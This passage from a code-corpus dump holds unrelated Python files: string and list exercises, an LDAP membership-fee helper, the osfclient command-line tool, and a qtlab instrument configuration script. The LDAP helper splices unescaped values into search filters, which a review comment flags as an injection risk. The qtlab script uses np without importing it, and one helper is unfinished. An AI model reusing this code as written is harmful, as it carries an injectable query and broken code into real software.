# Task 2: 'done. ' prefix for title-cased strings, 'draft: ' otherwise.
print('Some string:', string)
if string.istitle():
    print('Some edited string: done. ' + string)
else:
    print('Some edited string:', string.replace('Lorem', 'draft: '))

# Task 3: clamp or pad the string to exactly 20 characters.
print('Some string:', string)
if len(string) > 20:
    string = string[:20]
    print('Some edited string:', string)
else:
    print('Some edited string:', string.ljust(20, '@'))
|
8,089 | d726e468a9df26f1bcb8a016812b87fad7b41aa8 | from brie.config import ldap_config
from brie.model.ldap import *
from brie.lib.log_helper import BrieLogging
import datetime
import smtplib
class Residences:
    """Lookups in the LDAP directory of residence groups."""

    @staticmethod
    def get_dn_by_name(user_session, name):
        """Return the member DN of the residence named *name*, or None.

        NOTE(review): *name* is spliced into the LDAP filter unescaped --
        confirm callers never pass user-controlled values.
        """
        entry = user_session.ldap_bind.search_first(ldap_config.liste_residence_dn, "(cn=" + name + ")")
        return entry.uniqueMember.first() if entry is not None else None
    #end def

    @staticmethod
    def get_name_by_dn(user_session, dn):
        """Return the name (cn) of the residence whose member DN is *dn*, or None."""
        entry = user_session.ldap_bind.search_first(ldap_config.liste_residence_dn, "(uniqueMember=" + dn + ")")
        return entry.cn.first() if entry is not None else None
    #end def

    @staticmethod
    def get_residences(user_session):
        """Return every residence group entry under the residence list DN."""
        return user_session.ldap_bind.search(ldap_config.liste_residence_dn, "(objectClass=groupOfUniqueNames)")
    #end def
#end class
class CotisationComputes:
    """Date arithmetic for membership fees ("cotisations").

    The membership year runs from September to August: months 9-12 belong
    to membership year N+1. Most helpers work on LDAP cotisation entries
    and on the member's "anniversary" date, i.e. the day the months
    already paid for run out.
    """
    @staticmethod
    def current_year():
        """Return today's membership year (Sep..Dec count as next year)."""
        now = datetime.datetime.now()
        if now.month > 8:
            return now.year + 1
        return now.year
    #end def
    @staticmethod
    def registration_current_year():
        """Return the calendar year in which the current membership year started."""
        now = datetime.datetime.now()
        if now.month > 8:
            return now.year
        return now.year - 1
    #end def
    @staticmethod
    def get_available_months(start, end, paid_months = []):
        """Return the months from *start* to *end* (possibly wrapping over
        the new year inside one Sep-Aug membership year) that are not
        already in *paid_months*.

        Raises Exception for month numbers > 12 or a range that leaves the
        membership year. NOTE(review): the mutable default for paid_months
        is only read, never mutated, so it is harmless here.
        """
        next_months_available = []
        if start > 12 or end > 12:
            raise Exception("invalid start or end")
        if start > 8 and end > 8:
            # both bounds in the Sep-Dec part of the membership year
            next_months_available = range(start, end + 1)
        elif start <= 8 and end < 9:
            # both bounds in the Jan-Aug part
            next_months_available = range(start, end + 1)
        elif start > 8:
            # range wraps over the new year (e.g. Nov -> Feb)
            next_months_available = range(start, 13) + range(1, end + 1 )
        else:
            raise Exception("invalid start and end")
        #end if
        if paid_months == []:
            return next_months_available
        BrieLogging.get().debug(next_months_available)
        available_months = [
            month
            for month in next_months_available
            if month not in paid_months
        ]
        return available_months
    #end def
    @staticmethod
    def is_valid_month(month):
        """True when *month* is still payable in the current membership year."""
        now = datetime.datetime.now()
        if now.month > 8:
            # Sep-Dec: valid months are now..Dec plus Jan..Aug
            return (month >= now.month and month < 13) or (month >= 1 and month < 9)
        else:
            return month >= now.month and month < 9
        #end if
    #end def
    @staticmethod
    def price_to_pay(year_price, month_price, already_paid, number_months_to_pay):
        """Price of *number_months_to_pay* months, capped so the yearly
        total never exceeds *year_price*."""
        months_price = number_months_to_pay * month_price
        BrieLogging.get().debug("already paid : " + str(already_paid))
        BrieLogging.get().debug("months price : " + str(months_price))
        if already_paid + months_price > year_price:
            months_price = max(0, year_price - already_paid)
        return months_price
    #end def
    @staticmethod
    def anniversary_from_ldap_items(ldap_cotisations):
        """Compute the member's anniversary date, i.e. when the months
        covered by *ldap_cotisations* run out.

        Months are ordered per the Sep..Aug membership year (SORT_ORDER).
        Consecutive cotisations keep the original anniversary day; a gap
        restarts the computation from the later cotisation. Returns the
        sentinel 1999-01-31 12:00 when there is no cotisation at all.
        """
        result = []
        months = []
        # membership-year ordering: Sep=0 ... Aug=11
        SORT_ORDER = {9: 0, 10: 1, 11: 2, 12: 3, 1: 4, 2: 5, 3: 6, 4: 7, 5: 8, 6: 9, 7: 10, 8: 11}
        for cotisation in ldap_cotisations:
            cotisation_months = []
            anniversary_data = cotisation.get("x-time").first()
            anniversary_datetime = datetime.datetime.strptime(anniversary_data,
                "%Y-%m-%d %H:%M:%S.%f")
            for month in cotisation.get("x-validMonth").all():
                months.append(int(month))
                cotisation_months.append(int(month))
            #end for
            cotisation_months.sort(key=lambda val: SORT_ORDER[val])
            result.append((anniversary_datetime, cotisation_months))
        #end for
        anniversary = 0
        # sort cotisations by payment date
        result = sorted(result)
        previousMonth = -1
        months.sort(key=lambda val: SORT_ORDER[val])
        # scan each cotisation
        for resultat in result:
            # if this is not the first cotisation and there is no gap with
            # the previous one, the anniversary date stays the same
            if previousMonth != -1 and ( (resultat[1][0] == 1 and previousMonth == 12) or (resultat[1][0] == previousMonth + 1) ):
                previousMonth = resultat[1][-1]
                continue;
            # otherwise recompute the anniversary date
            else :
                previousMonth = resultat[1][-1]
            #end if
            anniversary_day = resultat[0].day
            anniversary_month = months[-1] + 1
            if anniversary_month == 13:
                anniversary_month = 1
            if anniversary_month > 9 or resultat[0].month < 9:
                # anniversary year equals the cotisation year when the
                # anniversary falls in Sep-Dec, or when the payment itself
                # was made in Jan-Aug
                anniversary_year = resultat[0].year
            else :
                # paid in Sep-Dec with the covered months ending in the
                # following calendar year
                anniversary_year = resultat[0].year + 1
            anniversary = datetime.datetime.strptime(str(anniversary_year) + "-" + str(anniversary_month) + "-1 0:0", "%Y-%m-%d %H:%M") + datetime.timedelta(days=(anniversary_day - 1))
        #end for
        if anniversary == 0:
            # sentinel "far in the past" date: no cotisation at all
            anniversary = datetime.datetime(1999, 1, 31, 12, 0)
        return anniversary
    #end def
    @staticmethod
    # returns the current date when the member has not been covered for
    # more than 30 days, otherwise the current anniversary date
    def generate_new_anniversary_from_ldap_items(ldap_cotisations):
        anniversary = CotisationComputes.anniversary_from_ldap_items(ldap_cotisations)
        now = datetime.datetime.now()
        if anniversary == 0 or (now - anniversary).days > 30:
            return now
        else :
            return anniversary
        #end if
    #end def
    @staticmethod
    # old = SDF or no cotisation this year
    def is_old_member(member_dn, user_session, residence_dn, cotisations = None):
        """True when the member has no room or (outside September) no
        cotisation for the current membership year."""
        if cotisations is None:
            current_year = CotisationComputes.current_year()
            cotisations = Cotisation.cotisations_of_member(user_session, member_dn, current_year)
        #end if
        # in September nobody is flagged old, so returning members do not
        # get disconnected during re-registration
        return Room.get_by_member_dn(user_session, residence_dn, member_dn) == None or (datetime.datetime.now().month != 9 and cotisations == [])
    #end def
    @staticmethod
    # no cotisation for the new year and last year august didn't payed
    def is_member_to_delete(member, user_session, residence_dn):
        """True when the member paid nothing this membership year and was
        not covered up to the end of last August (7-day grace period)."""
        current_year = CotisationComputes.current_year()
        cotisations_this_year = Cotisation.cotisations_of_member(user_session, member.dn, current_year)
        cotisations_previous_year = Cotisation.cotisations_of_member(user_session, member.dn, current_year - 1)
        if cotisations_this_year == [] and cotisations_previous_year == []:
            return True
        now = datetime.datetime.now()
        if now.month < 9:
            last_year = datetime.datetime(now.year - 1, 8, 31, 12, 0)
        else:
            last_year = datetime.datetime(now.year, 8, 31, 12, 0)
        #end if
        anniversary = CotisationComputes.anniversary_from_ldap_items(cotisations_previous_year)
        # no cotisation this year, and coverage stopped more than 7 days
        # before the end of last August (or the member has no room)
        delta = (last_year - anniversary)
        return cotisations_this_year == [] and (delta.days > 7 or Room.get_by_member_dn(user_session, residence_dn, member.dn) == None)
    #end def
    @staticmethod
    # 7 days grace period
    def is_cotisation_was_paid_last_year(member_dn, user_session, residence_dn, cotisations = None, anniversary = None):
        """True when the member's coverage reached the end of last August,
        within a 7-day grace period."""
        if cotisations is None:
            current_year = CotisationComputes.current_year() - 1
        #end if
        now = datetime.datetime.now()
        if now.month < 9:
            last_year = datetime.datetime(now.year - 1, 8, 31, 12, 0)
        else:
            last_year = datetime.datetime(now.year, 8, 31, 12, 0)
        #end if
        if cotisations is None:
            cotisations = Cotisation.cotisations_of_member(user_session, member_dn, current_year)
        #end if
        if anniversary is None:
            anniversary = CotisationComputes.anniversary_from_ldap_items(cotisations)
        #end if
        delta = (last_year - anniversary)
        return delta.days <= 7
    #end def
    @staticmethod
    # 7 days grace period
    def is_cotisation_paid(member_dn, user_session, residence_dn, cotisations = None, anniversary = None, verification_old_member = True):
        """True when the anniversary is at most 7 days in the past, with a
        September extension for members in good standing last August."""
        if verification_old_member and CotisationComputes.is_old_member(member_dn, user_session, residence_dn, cotisations):
            return False
        if cotisations is None:
            current_year = CotisationComputes.current_year()
        #end if
        now = datetime.datetime.now()
        if cotisations is None:
            cotisations = Cotisation.cotisations_of_member(user_session, member_dn, current_year)
        #end if
        if anniversary is None:
            anniversary = CotisationComputes.anniversary_from_ldap_items(cotisations)
        #end if
        delta = (now - anniversary)
        if delta.days > 7 and now.month == 9 and CotisationComputes.is_cotisation_was_paid_last_year(member_dn, user_session, residence_dn):
            # the member was up to date in August: grant a payment delay in
            # September -- no disconnection
            return True
        #end if
        return delta.days <= 7
    #end def
    @staticmethod
    # less than a month late but more than a week
    def is_cotisation_late(member_dn, user_session, residence_dn, cotisations = None, anniversary = None, verification_old_member = True):
        """True when the anniversary is between 8 and 30 days in the past."""
        if verification_old_member and CotisationComputes.is_old_member(member_dn, user_session, residence_dn, cotisations):
            return False
        if cotisations is None:
            current_year = CotisationComputes.current_year()
        #end if
        now = datetime.datetime.now()
        if cotisations is None:
            cotisations = Cotisation.cotisations_of_member(user_session, member_dn, current_year)
        #end if
        if anniversary is None:
            anniversary = CotisationComputes.anniversary_from_ldap_items(cotisations)
        #end if
        delta = (now - anniversary)
        return delta.days <= 30 and delta.days > 7
    #end def
    # NOTE(review): unlike its siblings this is not decorated with
    # @staticmethod, and it builds mail fields without ever sending
    # anything -- it looks unfinished; confirm before relying on it.
    def cotisation_late_reminder(member_dn, user_session, residence_dn):
        member = Member.get_by_dn(user_session,member_dn)
        from_mail = "noreply@fede-aurore.net"
        to_mail = [member.mail.first()]
        residence_name = Residences.get_name_by_dn(user_session,residence_dn).decode("utf-8").encode("ascii", "ignore")
    #end def
    @staticmethod
    # more than a month late
    def is_no_cotisation(member_dn, user_session, residence_dn, cotisations = None, anniversary = None, verification_old_member = True):
        """True when the anniversary is more than 30 days in the past."""
        if verification_old_member and CotisationComputes.is_old_member(member_dn, user_session, residence_dn, cotisations):
            return False
        if cotisations is None:
            current_year = CotisationComputes.current_year()
        #end if
        now = datetime.datetime.now()
        if cotisations is None:
            cotisations = Cotisation.cotisations_of_member(user_session, member_dn, current_year)
        #end if
        if anniversary is None:
            anniversary = CotisationComputes.anniversary_from_ldap_items(cotisations)
        #end if
        delta = (now - anniversary)
        return delta.days > 30
    #end def
    @staticmethod
    def members_status_from_residence(user_session, residence_dn):
        """Classify every member of the residence into old / paid / late /
        unpaid buckets (one LDAP cotisation query per member)."""
        members = Member.get_all(user_session, residence_dn)
        old_members = []
        cotisation_paid_members = []
        cotisation_late_members = []
        no_cotisation_members = []
        for member in members:
            current_year = CotisationComputes.current_year()
            cotisations = Cotisation.cotisations_of_member(user_session, member.dn, current_year)
            if CotisationComputes.is_old_member(member.dn, user_session, residence_dn, cotisations):
                old_members.append(member)
            elif CotisationComputes.is_cotisation_paid(member.dn, user_session, residence_dn, cotisations):
                cotisation_paid_members.append(member)
            elif CotisationComputes.is_cotisation_late(member.dn, user_session, residence_dn, cotisations):
                cotisation_late_members.append(member)
            elif CotisationComputes.is_no_cotisation(member.dn, user_session, residence_dn, cotisations):
                no_cotisation_members.append(member)
            else:
                BrieLogging.get().warn("aurore_helper:336 member with weird status !")
            #end if
        #end for
        return dict(old_members=old_members, cotisation_paid_members=cotisation_paid_members, cotisation_late_members=cotisation_late_members, no_cotisation_members=no_cotisation_members)
    #end def
    @staticmethod
    def members_status_from_list_cotisations(user_session, residence_dn, cotisations):
        """Bulk variant of members_status_from_residence working on an
        already-fetched cotisation list; buckets hold member DNs instead
        of Member objects."""
        members_dict = dict()
        for cotisation in cotisations:
            cotisation_dn = cotisation.dn.split(",")
            member_dn = ""
            # the member DN is the cotisation DN minus its first 3 RDNs
            for i in range(3, len(cotisation_dn)):
                if i != 3:
                    member_dn += ","
                #end if
                member_dn += cotisation_dn[i]
            #end for
            if not member_dn in members_dict:
                members_dict[member_dn] = [cotisation]
            else:
                members_dict[member_dn].append(cotisation)
            #end if
        #end for
        BrieLogging.get().debug(str(datetime.datetime.now()) + "members_status_from_list_cotisations:" + str(len(members_dict)))
        old_members = []
        cotisation_paid_members = []
        cotisation_late_members = []
        no_cotisation_members = []
        # start by assuming every member with a cotisation is "old" ...
        for member_dn, cotisations in members_dict.iteritems():
            old_members.append(member_dn)
        #end for
        rooms = Room.get_rooms(user_session, residence_dn)
        for room in rooms:
            # ... then un-flag everyone who still owns a room
            if room.has("x-memberIn") and room.get("x-memberIn").first() in members_dict and room.get("x-memberIn").first() in old_members:
                old_members.remove(room.get("x-memberIn").first())
            #endif
        #endfor
        for member_dn, cotisations in members_dict.iteritems():
            anniversary = CotisationComputes.anniversary_from_ldap_items(cotisations)
            if CotisationComputes.is_cotisation_paid(member_dn, user_session, residence_dn, cotisations, anniversary, False):
                cotisation_paid_members.append(member_dn)
            elif CotisationComputes.is_cotisation_late(member_dn, user_session, residence_dn, cotisations, anniversary, False):
                cotisation_late_members.append(member_dn)
            elif CotisationComputes.is_no_cotisation(member_dn, user_session, residence_dn, cotisations, anniversary, False):
                no_cotisation_members.append(member_dn)
            else:
                BrieLogging.get().debug("aurore_helper:393 : member with weird status !")
            #end if
        #end for
        return dict(old_members=old_members, cotisation_paid_members=cotisation_paid_members, cotisation_late_members=cotisation_late_members, no_cotisation_members=no_cotisation_members)
    #end def
#end class
|
8,090 | 3752b68e151379c57e1494715a45172607f4aead | # file = open('suifeng.txt')
# # text = file.read()
# # print(text)
# # file.close()
# with open('suifeng.txt') as f:
# print(f.read())
# Build [0, 2, ..., 20] twice: once with a loop, once with a comprehension.
newList = []
for i in range(11):
    newList.append(i * 2)
print(newList)

newList2 = [i * 2 for i in range(11)]
print(newList2)

# Keep only the names starting with '王'.
# NOTE(review): the name `list` shadows the builtin; kept as-is because
# the statement following this exercise still reads it.
list = ["小米", "王银龙", "王思"]
emptyList = [name for name in list if name.startswith('王')]
print(emptyList)
print([name for name in list if name.startswith('王')]) |
8,091 | ca551d8e55ebb15a03077af5695782c6d72ff2fd | """Command line interface to the OSF
These functions implement the functionality of the command-line interface.
"""
from __future__ import print_function
from functools import wraps
import getpass
import os
import sys
from six.moves import configparser
from six.moves import input
from tqdm import tqdm
from .api import OSF
from .exceptions import UnauthorizedException
from .utils import norm_remote_path, split_storage, makedirs, checksum
def config_from_file():
    """Read the [osf] section of ./.osfcli.config into a plain dict.

    Returns an empty dict when no config file exists in the current
    working directory.
    """
    if not os.path.exists(".osfcli.config"):
        return {}
    parser = configparser.ConfigParser()
    parser.read(".osfcli.config")
    # materialize as a plain dict (python2 compatibility)
    return dict(parser.items('osf'))
def config_from_env(config):
    """Overlay OSF_USERNAME / OSF_PROJECT environment variables onto
    *config* (mutated in place) and return it."""
    for env_var, key in (("OSF_USERNAME", 'username'), ("OSF_PROJECT", 'project')):
        value = os.getenv(env_var)
        if value is not None:
            config[key] = value
    return config
def _get_username(args, config):
if args.username is None:
username = config.get('username')
else:
username = args.username
return username
def _setup_osf(args):
    """Build an OSF client from CLI args, environment and config file.

    Precedence: command line > environment variables > config file.
    Exits the process when no project ID can be determined. Prompts for a
    password when a username is known but OSF_PASSWORD is unset.
    """
    config = config_from_env(config_from_file())
    username = _get_username(args, config)
    if args.project is None:
        args.project = config.get('project')
    if args.project is None:
        # no project from CLI, environment or file -- cannot continue
        sys.exit('You have to specify a project ID via the command line,'
                 ' configuration file or environment variable.')
    password = None
    if username is not None:
        password = os.getenv("OSF_PASSWORD")
        if password is None:
            # prompt only when the environment variable is absent
            password = getpass.getpass('Please input your password: ')
    return OSF(username=username, password=password)
def might_need_auth(f):
    """Decorate a CLI function that might require authentication.

    Catches any UnauthorizedException raised, prints a helpful message and
    then exits.
    """
    @wraps(f)
    def wrapper(cli_args):
        try:
            return f(cli_args)
        except UnauthorizedException:
            config = config_from_env(config_from_file())
            if _get_username(cli_args, config) is None:
                sys.exit("Please set a username (run `osf -h` for details).")
            sys.exit("You are not authorized to access this project.")

    return wrapper
def init(args):
    """Initialize or edit an existing .osfcli.config file.

    Shows the current username/project (if any) and asks the user for new
    values; an empty answer keeps the existing value.  The result is written
    back to ./.osfcli.config.
    """
    # reading existing config file, convert to configparser object
    config = config_from_file()
    config_ = configparser.ConfigParser()
    config_.add_section('osf')
    # seed the parser with current values, defaulting to empty strings
    config_.set('osf', 'username', config.get('username', ''))
    config_.set('osf', 'project', config.get('project', ''))

    # now we can start asking for new values
    print('Provide a username for the config file [current username: {}]:'.format(
        config_.get('osf', 'username')))
    username = input()
    if username:
        config_.set('osf', 'username', username)

    print('Provide a project for the config file [current project: {}]:'.format(
        config_.get('osf', 'project')))
    project = input()
    if project:
        config_.set('osf', 'project', project)

    # BUG FIX: use a context manager so the file handle is closed even when
    # config_.write() raises (the original open()/close() pair leaked on error)
    with open(".osfcli.config", "w") as cfgfile:
        config_.write(cfgfile)
@might_need_auth
def clone(args):
    """Copy all files from all storages of a project.

    The output directory defaults to the current directory.

    If the project is private you need to specify a username.

    If args.update is True, overwrite any existing local files only if local
    and remote files differ (compared via MD5 checksum).
    """
    osf = _setup_osf(args)
    project = osf.project(args.project)
    output_dir = args.project
    if args.output is not None:
        output_dir = args.output
    with tqdm(unit='files') as pbar:
        for store in project.storages:
            # each storage provider gets its own sub-directory under output_dir
            prefix = os.path.join(output_dir, store.name)
            for file_ in store.files:
                path = file_.path
                # remote paths are rooted; strip the leading slash before joining
                if path.startswith('/'):
                    path = path[1:]
                path = os.path.join(prefix, path)
                # in --update mode, skip the download when the local copy
                # already matches the remote MD5
                if os.path.exists(path) and args.update:
                    if checksum(path) == file_.hashes.get('md5'):
                        continue
                directory, _ = os.path.split(path)
                makedirs(directory, exist_ok=True)
                with open(path, "wb") as f:
                    file_.write_to(f)
                pbar.update()
@might_need_auth
def fetch(args):
    """Fetch an individual file from a project.

    The first part of the remote path is interpreted as the name of the
    storage provider. If there is no match the default (osfstorage) is
    used.

    The local path defaults to the name of the remote file.

    If the project is private you need to specify a username.

    If args.force is True, write local file even if that file already exists.
    If args.force is False but args.update is True, overwrite an existing local
    file only if local and remote files differ.

    NOTE(review): when no remote file matches, the function returns silently
    without writing anything — confirm that is the intended UX.
    """
    storage, remote_path = split_storage(args.remote)
    local_path = args.local
    if local_path is None:
        _, local_path = os.path.split(remote_path)
    local_path_exists = os.path.exists(local_path)
    # refuse to clobber an existing local file unless --force or --update
    if local_path_exists and not args.force and not args.update:
        sys.exit("Local file %s already exists, not overwriting." % local_path)
    directory, _ = os.path.split(local_path)
    if directory:
        makedirs(directory, exist_ok=True)
    osf = _setup_osf(args)
    project = osf.project(args.project)
    store = project.storage(storage)
    for file_ in store.files:
        if norm_remote_path(file_.path) == remote_path:
            # --update (without --force): skip the download when the local
            # checksum already matches the remote MD5
            if local_path_exists and not args.force and args.update:
                if file_.hashes.get('md5') == checksum(local_path):
                    print("Local file %s already matches remote." % local_path)
                    break
            with open(local_path, 'wb') as fp:
                file_.write_to(fp)
            # only fetching one file so we are done
            break
@might_need_auth
def list_(args):
    """List all files from all storages for project.

    If the project is private you need to specify a username.
    """
    osf = _setup_osf(args)
    project = osf.project(args.project)

    for store in project.storages:
        for file_ in store.files:
            # strip the single leading slash so the storage name becomes
            # the first path component of the printed line
            remote = file_.path
            remote = remote[1:] if remote.startswith('/') else remote
            print(os.path.join(store.name, remote))
@might_need_auth
def upload(args):
    """Upload a new file to an existing project.

    The first part of the remote path is interpreted as the name of the
    storage provider. If there is no match the default (osfstorage) is
    used.

    If the project is private you need to specify a username.

    To upload a whole directory (and all its sub-directories) use the `-r`
    command-line option. If your source directory name ends in a / then
    files will be created directly in the remote directory. If it does not
    end in a slash an extra sub-directory with the name of the local directory
    will be created.

    To place contents of local directory `foo` in remote directory `bar/foo`:
    $ osf upload -r foo bar
    To place contents of local directory `foo` in remote directory `bar`:
    $ osf upload -r foo/ bar
    """
    osf = _setup_osf(args)
    if osf.username is None or osf.password is None:
        sys.exit('To upload a file you need to provide a username and'
                 ' password.')

    project = osf.project(args.project)
    storage, remote_path = split_storage(args.destination)
    if remote_path == '':
        # no remote name given: default to the local file/directory name
        remote_path = os.path.split(args.source)[-1]

    store = project.storage(storage)
    if args.recursive:
        if not os.path.isdir(args.source):
            raise RuntimeError("Expected source ({}) to be a directory when "
                               "using recursive mode.".format(args.source))

        # local name of the directory that is being uploaded; empty when
        # args.source ends in a slash, which uploads contents directly
        _, dir_name = os.path.split(args.source)

        for root, _, files in os.walk(args.source):
            # sub-directory of the current walk step, relative to the source root
            subdir_path = os.path.relpath(root, args.source)
            for fname in files:
                local_path = os.path.join(root, fname)
                with open(local_path, 'rb') as fp:
                    # build the remote path + fname
                    name = os.path.join(remote_path, dir_name, subdir_path,
                                        fname)
                    store.create_file(name, fp, force=args.force,
                                      update=args.update)

    else:
        with open(args.source, 'rb') as fp:
            store.create_file(remote_path, fp, force=args.force,
                              update=args.update)
@might_need_auth
def remove(args):
    """Remove a file from the project's storage.

    The first part of the remote path is interpreted as the name of the
    storage provider. If there is no match the default (osfstorage) is
    used.
    """
    osf = _setup_osf(args)
    if osf.username is None or osf.password is None:
        sys.exit('To remove a file you need to provide a username and'
                 ' password.')

    storage, remote_path = split_storage(args.target)
    store = osf.project(args.project).storage(storage)

    # delete every stored file whose normalized path matches the target
    for file_ in store.files:
        if norm_remote_path(file_.path) == remote_path:
            file_.remove()
|
8,092 | 3f20438b0dd2ae8de470e5456dbb764eabf69645 | import types
import qt
# qtlab's global configuration manager (used via set/get/save_all below)
cfg = qt.cfgman

# rebuild the three configuration trees from scratch so no stale keys survive
cfg.remove_cfg('protocols')
cfg.remove_cfg('samples')
cfg.remove_cfg('setup')
cfg.add_cfg('protocols')
cfg.add_cfg('samples')
cfg.add_cfg('setup')

# select the active sample and its default protocol set
cfg['samples']['current'] = 'hans-sil13'
cfg['protocols']['current'] = 'hans-sil13-default'

# python 2 print statement -- this script targets the legacy (py2) qtlab runtime
print 'updating msmt params for {}'.format(cfg['samples']['current'])
##############################################################################
##############################################################################
### Protocols
###
### To make sure everything works fine, only leave the current sample
### un-commented here (we use local variables here for convenience,
### that WILL lead to trouble because the get overwritten in each sample
### section)
##############################################################################
##############################################################################
##############################################################################
### The111/2
##############################################################################
# branch='samples/sil2/'
# f_msm1_cntr = 2.826961e9
# N_frq = 7.13429e6
# N_HF_frq = 2.19290e6
# cfg.set(branch+'ms-1_cntr_frq', f_msm1_cntr)
# cfg.set(branch+'N_0-1_splitting_ms-1', N_frq)
# cfg.set(branch+'N_HF_frq', N_HF_frq)
# mw0 = 2.8e9
# f0 = f_msm1_cntr - mw0
# Nsplit = N_HF_frq
# finit = f0 - Nsplit
# fmIp1 = f_msm1_cntr - mw0 + N_HF_frq
# cfg.set(branch+'mIm1_mod_frq', f_msm1_cntr - mw0 - N_HF_frq)
# cfg.set(branch+'mI0_mod_frq', f_msm1_cntr - mw0)
# cfg.set(branch+'mIp1_mod_frq', f_msm1_cntr - mw0 + N_HF_frq)
##############################################################################
### HANS/4
##############################################################################
# branch='samples/hans-sil4/'
# f_msm1_cntr = 2.826455e9
# N_frq = 7.13377e6
# N_HF_frq = 2.19290e6
# cfg.set(branch+'ms-1_cntr_frq', f_msm1_cntr)
# cfg.set(branch+'N_0-1_splitting_ms-1', N_frq)
# cfg.set(branch+'N_HF_frq', N_HF_frq)
# mw0 = 2.8e9
# f0 = f_msm1_cntr - mw0
# Nsplit = N_HF_frq
# finit = f0 - Nsplit
# fmIp1 = f_msm1_cntr - mw0 + N_HF_frq
# cfg.set(branch+'mIm1_mod_frq', f_msm1_cntr - mw0 - N_HF_frq)
# cfg.set(branch+'mI0_mod_frq', f_msm1_cntr - mw0)
# cfg.set(branch+'mIp1_mod_frq', f_msm1_cntr - mw0 + N_HF_frq)
# --- hans-sil4 sample parameters (frequencies in Hz) ---
branch='samples/hans-sil4/'
f_msm1_cntr = 2.827962e9    # 'ms-1_cntr_frq': center frequency of the ms=-1 transition
N_frq = 7.13456e6           # 'N_0-1_splitting_ms-1': nitrogen 0<->-1 splitting in ms=-1
N_HF_frq = 2.19290e6        # nitrogen hyperfine frequency
cfg.set(branch+'ms-1_cntr_frq', f_msm1_cntr)
cfg.set(branch+'N_0-1_splitting_ms-1', N_frq)
cfg.set(branch+'N_HF_frq', N_HF_frq)
# modulation frequencies below are offsets of the transition from the MW carrier mw0
mw0 = 2.8e9
f0 = f_msm1_cntr - mw0      # modulation frequency of the center (mI=0) line
Nsplit = N_HF_frq
finit = f0 - Nsplit         # center minus one hyperfine splitting (mI=-1 line)
fmIp1 = f_msm1_cntr - mw0 + N_HF_frq    # center plus one hyperfine splitting (mI=+1 line)
cfg.set(branch+'mIm1_mod_frq', f_msm1_cntr - mw0 - N_HF_frq)
cfg.set(branch+'mI0_mod_frq', f_msm1_cntr - mw0)
cfg.set(branch+'mIp1_mod_frq', f_msm1_cntr - mw0 + N_HF_frq)
##############################################################################
##############################################################################
### Protocols
##############################################################################
##############################################################################
### General settings for AdwinSSRO
branch='protocols/AdwinSSRO/'
cfg.set(branch+ 'AWG_done_DI_channel', 16)
cfg.set(branch+ 'AWG_event_jump_DO_channel', 14)
cfg.set(branch+ 'AWG_start_DO_channel', 10)
cfg.set(branch+ 'A_laser_DAC_channel', 6)
cfg.set(branch+ 'Ex_laser_DAC_channel', 7)
cfg.set(branch+ 'counter_channel', 1)
cfg.set(branch+ 'cycle_duration', 300)
cfg.set(branch+ 'green_laser_DAC_channel', 4)
cfg.set(branch+ 'green_off_amplitude', 0.0)
cfg.set(branch+ 'green_repump_amplitude', 50e-6)
cfg.set(branch+ 'green_repump_duration', 10)
cfg.set(branch+ 'send_AWG_start', 0)
cfg.set(branch+ 'sequence_wait_time', 1)
cfg.set(branch+ 'wait_after_RO_pulse_duration', 3)
cfg.set(branch+ 'wait_after_pulse_duration', 3)
cfg.set(branch+ 'cr_wait_after_pulse_duration', 1)
cfg.set(branch+ 'wait_for_AWG_done', 0)
cfg.set(branch+ 'green_off_voltage', 0)
cfg.set(branch+ 'repump_off_voltage', 0)
cfg.set(branch+ 'yellow_repump_amplitude', 50e-9)
cfg.set(branch+ 'yellow_repump_duration', 500)
cfg.set(branch+ 'yellow_repump_after_repetitions',100)
cfg.set(branch+ 'yellow_CR_repump', 1)
cfg.set(branch+ 'green_repump_after_repetitions',1)
cfg.set(branch+ 'green_CR_repump', 1000)
cfg.set(branch+ 'CR_probe_max_time', 1000000)
cfg.set(branch+ 'SP_filter_duration', 0)
cfg.set(branch+ 'SSRO_duration', 50)
cfg.set(branch+ 'SSRO_repetitions', 1000)
cfg.set(branch+ 'SSRO_stop_after_first_photon', 0)
# master switch: copy either the yellow_* or the green_* repump settings
# (set above on this AdwinSSRO branch) into the generic repump_* keys
yellow=True
cfg.set(branch + 'yellow', yellow)
if yellow:
    cfg.set(branch + 'repump_duration', cfg.get(branch+ 'yellow_repump_duration'))
    cfg.set(branch + 'repump_amplitude', cfg.get(branch+ 'yellow_repump_amplitude'))
    cfg.set(branch + 'CR_repump', cfg.get(branch+ 'yellow_CR_repump'))
    cfg.set(branch + 'repump_after_repetitions', cfg.get(branch+ 'yellow_repump_after_repetitions'))
else:
    cfg.set(branch + 'repump_duration', cfg.get(branch+ 'green_repump_duration'))
    cfg.set(branch + 'repump_amplitude', cfg.get(branch+ 'green_repump_amplitude'))
    cfg.set(branch + 'CR_repump', cfg.get(branch+ 'green_CR_repump'))
    cfg.set(branch + 'repump_after_repetitions', cfg.get(branch+ 'green_repump_after_repetitions'))
### General settings for AdwinSSRO+espin
branch='protocols/AdwinSSRO+espin/'
cfg.set(branch+ 'send_AWG_start', 1)
cfg.set(branch+ 'MW_pulse_mod_risetime', 10e-9)
cfg.set(branch+ 'mw_frq', mw0)
cfg.set(branch+ 'mw_power', 20)
### General settings for AdwinSSRO+MBI
branch='protocols/AdwinSSRO+MBI/'
cfg.set(branch+ 'AWG_wait_duration_before_MBI_MW_pulse', 1e-6)
cfg.set(branch+ 'AWG_wait_for_adwin_MBI_duration',
np.array([15e-6]).tolist())
cfg.set(branch+ 'AWG_wait_duration_before_shelving_pulse', 100e-9)
cfg.set(branch+ 'nr_of_ROsequences', 1)
cfg.set(branch+ 'MW_pulse_mod_risetime', 10e-9)
cfg.set(branch+ 'AWG_to_adwin_ttl_trigger_duration', 5e-6)
cfg.set(branch+ 'max_MBI_attempts', 1)
cfg.set(branch+ 'N_randomize_duration', 50)
cfg.set(branch+ 'Ex_N_randomize_amplitude', 0e-9)
cfg.set(branch+ 'A_N_randomize_amplitude', 0e-9)
cfg.set(branch+ 'yellow_N_randomize_amplitude', 0e-9)
##############################################################################
##############################################################################
### Specific sample settings for protocols
##############################################################################
##############################################################################
##############################################################################
### HANS/13 --- SSRO
##############################################################################
# SSRO protocol overrides for the currently selected sample (hans-sil13)
branch='protocols/hans-sil13-default/AdwinSSRO/'
cfg.set(branch+ 'A_CR_amplitude', 10e-9)
cfg.set(branch+ 'A_RO_amplitude', 0.)
cfg.set(branch+ 'A_SP_amplitude', 10e-9)
cfg.set(branch+ 'CR_duration', 50)
cfg.set(branch+ 'CR_preselect', 1000)
cfg.set(branch+ 'CR_probe', 20)
cfg.set(branch+ 'CR_repump', 1000)
